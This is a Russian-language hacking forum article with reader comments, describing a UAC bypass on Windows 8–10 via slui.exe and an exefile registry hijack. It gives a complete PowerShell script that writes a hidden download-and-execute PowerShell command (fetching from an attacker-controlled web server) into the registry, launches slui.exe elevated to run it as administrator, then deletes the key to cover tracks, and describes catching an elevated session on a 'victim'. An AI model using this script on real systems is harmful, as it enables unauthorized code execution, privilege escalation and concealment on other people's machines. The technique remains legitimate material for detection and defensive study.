Статья Windows LPE (Local Privilege Escalation [Bypas UAC 2018 slui.exe method] )

Всем доброго времени суток колеги.
Сегодня речь пойдет об относительно новом способе обхода User Account Control (
Ссылка скрыта от гостей
) и способе (
Ссылка скрыта от гостей
) - поднятия привилегий в системе Windows 8-10 x64 и x86 системах.
PS: Пишу сразу на двух форумах по этому :
CopyRights: <<<MisterBert0ni aka DarkNode>>>

СОДЕРЖАНИЕ СТАТЬИ:
  • Описания работы эксплоита
  • Демонстрация работы эксплоита
  • Вспомним про Web Delivery через PowerShell
  • Вспомним про RegSVR способ подгрузки
  • Похожие эксплоиты
Имя: Slui File Handler Hijak LPE
Дата публикации: 15.01.2018
Целевая ОС: Microsoft Windows
Патч: НЕТУ
Уязвимые версии: Windows 8-10 (x64 и x86)
Ссылка на сам експлоит

1.png
ПРИНЦИП РАБОТЫ ЭКСПЛОЙТА:

В операционной системе Windows версии 8-10 был обнаружен бинарный файл slui.exe - который является auto-elevated приложением ,так сказать - самоповышаемым.
Это дает возможность использовать обработчик
Ссылка скрыта от гостей
й для хайджекинга в привилегированый процесс.

Простыми словамя говоря:
Мы создаем в реестре Windows запись , которая скажет что при открытии всех *.EXE файлов - будет выполнятся наша команда или вредоносный файл, после чего запускаем slui.exe , соответственно вместо slui.exe запустится наш пейлоад от имени администратора.

Для того чтобы понять как это работает давайте приступим к практической части:
1) Допустим у нас сессия без повышеных привилегий
2.png

2)Соотведственно, для того что бы все это вручную не писать , давайте подготовим простой скрипт для PowerShell:
3.png
Код: 
#Out Command | Наш пейлоад в моем случае вектор Web Delivery
$command = "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.1.79/')"


#Create Registry KEY | Создаем ключ в реестре для асоциации бинарных файлов и прописываем действие обработчику EXE файлов:

New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force

#Start slui.exe as Admin | Запускаем от имени админа
Start-Process "C:\Windows\System32\slui.exe" -Verb runas


#Remove registry structure | Удаляем асоциацию файлов
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force

В качестве вектора атаки я использовал Web Delivery , более подробно о нем я писал ранее в своей статье.
Так же имеет место быть вектор через regsvr32 , и огромное спасибо нашему коллеге @gushmazuko за то что написал готовый скрипт на PowerShell для работы с этим
вектором , готовый скрипт вы можете взять на его странице гитхаба

3)После того как мы набросали список действий в наш скрипт - ложим где-то на вебсервер ( в моем случае в условиях учебной практике - это локальная машина )
И запускаем на стороне жертвы тем же Web Delivery методом в моем случае:
4.png


5.png

4) Ловим сессию с повышеными привилегиями:)

7.png

Благодарность : @gushmazuko


Всем спасибо) С вами был DarkNode
Работа regsvr32 вектора покажу в видео)
 
Последнее редактирование:
  • Нравится
Реакции: TrevorReznik, kot-gor, TroideN и ещё 24
Нажмите, чтобы раскрыть...
F

f1rst

New member
03.04.2017
2
0
BIT
0
Не будет ли подниматься сессия пользователя при открытие любого exe пользователем а не админом?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
f1rst сказал(а):
Не будет ли подниматься сессия пользователя при открытие любого exe пользователем а не админом?
Нажмите, чтобы раскрыть...
Нет. В случае с пользователем - запросит пароль администратора. Этот вектор нацелен на обход UAC.
 
  • Нравится
Реакции: Vertigo
shArky

shArky

Green Team
07.01.2017
47
41
BIT
1
Хотелось бы внести небольшие правки в орфографию, не сочтите за грубость, но:
  1. Слово соотвеТственно пишется через Т, а не Д
  2. Слово колЛеге пишется с двумя Л, а не с одной
  3. Слово "где-то" пишется через тире
Далее я уверен, что автор торопился, поэтому у него были некоторые "очепятки":
  1. "подготим" на подготовим
  2. "Свами" раздельно
  3. "смасибо" на спасибо
  4. "говотый" на готовый
  5. "приступи"на приступим
  6. "процес" на процесс
  7. "что бы" в данном случае слитно
Ещё раз извиняюсь, но писать на такую тематику надо грамотно.
Исправляйтесь в следующий статьях, DarkNode!
 
  • Нравится
Реакции: <~DarkNode~>
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
shArky сказал(а):
Хотелось бы внести небольшие правки в орфографию, не сочтите за грубость, но:
  1. Слово соотвеТственно пишется через Т, а не Д
  2. Слово колЛеге пишется с двумя Л, а не с одной
  3. Слово "где-то" пишется через тире
Далее я уверен, что автор торопился, поэтому у него были некоторые "очепятки":
  1. "подготим" на подготовим
  2. "Свами" раздельно
  3. "смасибо" на спасибо
  4. "говотый" на готовый
  5. "приступи"на приступим
  6. "процес" на процесс
  7. "что бы" в данном случае слитно
Ещё раз извиняюсь, но писать на такую тематику надо грамотно.
Исправляйтесь в следующий статьях, DarkNode!
Нажмите, чтобы раскрыть...
Спасибо за поправки) Постараюсь уделить больше внимания )
 
K

karlomarx

One Level
03.05.2017
21
0
BIT
0
Мне всегда непонятно почему обходы UAC называют LPE,это не совсем так,да,это полезно,чтобы там завести мимикатз и тд,но обходы UAC все подразумевают запуск от Привилегированного изначально юзера.Вот ms16-032,это классический эксплойт LPE,запуская от любого пользователя,через повершелл,и через много векторов я получаю NT Authority/SYSTEM,то есть права системы что выше Админа.А обход UAC =обход UAC,и помощь в LPE,но не классическая эскалация привилегий
 
A

a113

Сколько бы не читал статьи, да и комментарии, Dark Node (aka MisterBert0ni :D), не перестаю удивляться хакерскому таланту этого человека.
Огромное спасибо за статьи!
 
  • Нравится
Реакции: gushmazuko и <~DarkNode~>
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
karlomarx сказал(а):
Мне всегда непонятно почему обходы UAC называют LPE,это не совсем так,да,это полезно,чтобы там завести мимикатз и тд,но обходы UAC все подразумевают запуск от Привилегированного изначально юзера.Вот ms16-032,это классический эксплойт LPE,запуская от любого пользователя,через повершелл,и через много векторов я получаю NT Authority/SYSTEM,то есть права системы что выше Админа.А обход UAC =обход UAC,и помощь в LPE,но не классическая эскалация привилегий
Нажмите, чтобы раскрыть...
Совершенно верное замечание. По сути это не LPE ( но тут имеется ввиду повышение привилегий в контексте "От не привилигерованного шелла до привилигерованного"
Это всего лишь базовая демонстрация техники обхода UAC через autoevelated приложения.
Таких приложений на самом деле очень и очень много, например тут можно найти такой список (в грей секшн создал пост с ссылкой)
Куда проще обходить UAC через token impersonation
 
R

rajan00

Если вы обнаружите, что все невообразимо, вы можете посмотреть
Ссылка скрыта от гостей
категории для лучшего обзора.
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ